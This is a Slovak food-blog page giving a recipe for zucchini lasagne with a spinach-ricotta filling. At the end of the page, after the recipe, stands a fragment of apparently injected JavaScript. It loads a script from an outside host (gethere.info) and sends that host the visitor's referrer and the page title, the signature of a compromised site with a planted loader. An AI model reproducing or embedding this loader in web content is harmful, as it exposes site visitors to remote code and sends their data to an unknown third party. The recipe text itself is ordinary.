FoodLover

prinášame pôžitok zo zdravého jedla

  • Blog
    • Recepty
      • Homemade
      • Raňajky
      • Šaláty
      • Polievky
      • Hlavné jedlá
      • Sladké potešenia
      • Slané pochúťky
    • Články
      • Zo života
      • Zdravá výzva
        • Jedálniček
        • Blog
        • Pravidlá pre rok 2016
        • O Whole30
  • Čo robím
    • Kurzy varenia
    • Catering
    • Produkty mandlove
  • O mne
    • Kto som
    • Príbeh
  • Kontakt
You are here: Home / Blog / Recepty / Hlavné jedlá / Cukinové lasagne

Cukinové lasagne

11/11/2014 by Martina

Takto vyzerá dokonalé talianske jedlo! A pritom je zdravé, bez lepku a akéhokoľvek pridaného cukru.

Lasagne vytvorené z nakrájanej cukiny, plnené špenátovo-ricottovou plnkou so sušenými paradajkami… Viac talianskych surovín pokope v jednom recepte snáď ani nenájdete.

IMG_6397

Ingrediencie:

  • 1 väčšia cukina
  • 250g ricotty
  • 150g špenátu (listový, kľudne aj mrazený)
  • 50g sušených paradajok
  • 1 žĺtko
  • soľ, korenie podľa chuti
  • štipka muškátového oriešku                                                     
  • 100ml pasírované paradajky (100% paradajková omáčka)
  • 20g parmezánu

Postup:

  1. Cukinu nakrájame na jemné plátky.
  2. Vymastíme zapekaciu misu / formičky.
  3. Ricottu, špenát, paradajky a žĺtko vymiešame na krémovú plnku. Osolíme, okoreníme a pridáme muškátový oriešok.
  4. Vrstvíme ako klasické lasagne.
  5. Zalejeme paradajkami a posypeme parmezánom.
  6. Pečieme 30 minút na 190°C.

Komu v tomto recepte chýba mäso, môže lasagne doplniť talianskymi šunkami či salámou…

Rovnako dobre chutia aj zohriate.

 

IMG_6397s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;